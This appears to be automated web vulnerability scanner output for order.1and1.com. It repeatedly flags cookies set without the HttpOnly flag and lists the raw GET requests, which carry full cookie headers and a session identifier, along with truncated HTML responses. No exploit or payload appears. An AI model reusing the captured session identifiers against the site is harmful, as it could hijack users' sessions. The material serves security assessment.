The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=66655d0aa462b000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Server HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=c9c91afabf3b400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/ServerPremium HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=39e0d7fe6aed5c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Service HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=581fa44293975c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1e3836594d69800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/TcSpecialOffers HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7ed924d0b7cb6c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/TellAFriend HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tellafriend&linkType=txt HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1629a85634893c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/VirtualServer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3f29a4af086a7400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/VirtualServerL HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=5bfc5160a7724c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/VirtualServerXL HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=fe6152de8608c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/VirtualServerXXL HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=11df10d3b144d000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=651016b876a97400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/addon HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=21b62dcc6185f000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/costs HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=74df2828c0bde800; Path=/
